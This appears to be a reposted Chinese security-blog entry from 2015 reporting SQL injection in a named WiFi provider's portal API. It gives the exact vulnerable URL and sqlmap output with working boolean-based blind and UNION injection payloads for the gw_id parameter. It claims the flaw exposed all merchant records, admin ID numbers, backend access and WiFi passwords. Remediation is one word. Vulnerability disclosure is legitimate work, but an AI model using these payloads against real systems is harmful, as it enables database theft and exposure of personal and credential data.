记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

网格WIFI注入泄露数万O2O商户信息和WIFI密码

2015-04-17 02:50

网格 WIFI 有注入漏洞, 可以下载所有商户的信息, 登录后台, WIFI 密码等

某个 API URL 可以注入:

http://portal.wangge.cc/api/index_v2.php?act=fetchsupinfo&gw_id=gw_yysx
 


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: gw_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: act=fetchsupinfo&gw_id=gw_yysx' AND 4455=4455#

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: act=fetchsupinfo&gw_id=-4311' UNION ALL SELECT NULL,CONCAT(0x7170706a71,0x48674363455743474866,0x7170716a71)#
---

所有库:
 

QQ20150301-1.png


所有 tables:
 

QQ20150228-1.png


所有 admin, 包括身份证号...
 

QQ20150301-4.png


登录后台某商家信息和WIFI密码截图
 

QQ20150301-5.png

 

解决方案:

过滤

知识来源: www.2cto.com/Article/201504/390907.html

阅读:93493 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“网格WIFI注入泄露数万O2O商户信息和WIFI密码”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云